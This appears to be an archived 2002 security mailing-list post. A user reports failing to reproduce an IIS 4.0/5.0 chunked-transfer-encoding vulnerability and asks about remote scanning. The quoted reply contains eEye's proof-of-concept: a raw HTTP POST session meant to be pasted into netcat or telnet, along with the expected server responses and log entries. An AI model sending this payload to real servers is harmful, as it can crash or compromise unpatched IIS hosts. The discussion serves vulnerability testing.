I have not been able to reproduce these results. I have managed to lock up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages appear and no entries in the Application Log. I have also been able get the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but still no popup or messages. Is there a reliable way to scan for these vulnerabilities remotely? On Thu, 2002-04-11 at 11:25, Erik Parker wrote: > JM> Anyone have a proof of concept for this exploit? > > eEye included some. Use this with "netcat" or "telnet" > > replace [enter] with an actual pressing of your enter key (look at the > bottom, you can cut n paste) > > It should return something like this, if it worked (and generate a popup > error to you that says "Unknown has generated errors") > > HTTP/1.1 100 Continue > Server: Microsoft-IIS/5.0 > Date: Wed, 27 Mar 2002 23:37:32 GMT > > If it fails, it'll say something like: > > HTTP/1.1 500 Server Error > Server: Microsoft-IIS/5.0 > > > The application log will say: > > Active Server Pages service has started > Access performance data was denied to IWAM_netbiosname as attempted from c:\WINNT\SYSTEM32\Drwtsn32.exe > > > **************Begin Session**************** > POST /iisstart.asp HTTP/1.1 > Accept: */* > Host: eeye.com > Content-Type: application/x-www-form-urlencoded > Transfer-Encoding: chunked > > 10 > PADPADPADPADPADP > 4 > DATA > 4 > DEST > 0 > [enter] > [enter] > **************End Session****************** > -- MadHat at Unspecific.com gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98 Key fingerprint = E786 7B30 7534 DCC2 94D5 91DE E922 0B21 9DDC 3E98
This archive was generated by hypermail 2b30 : Fri Apr 12 2002 - 09:33:06 PDT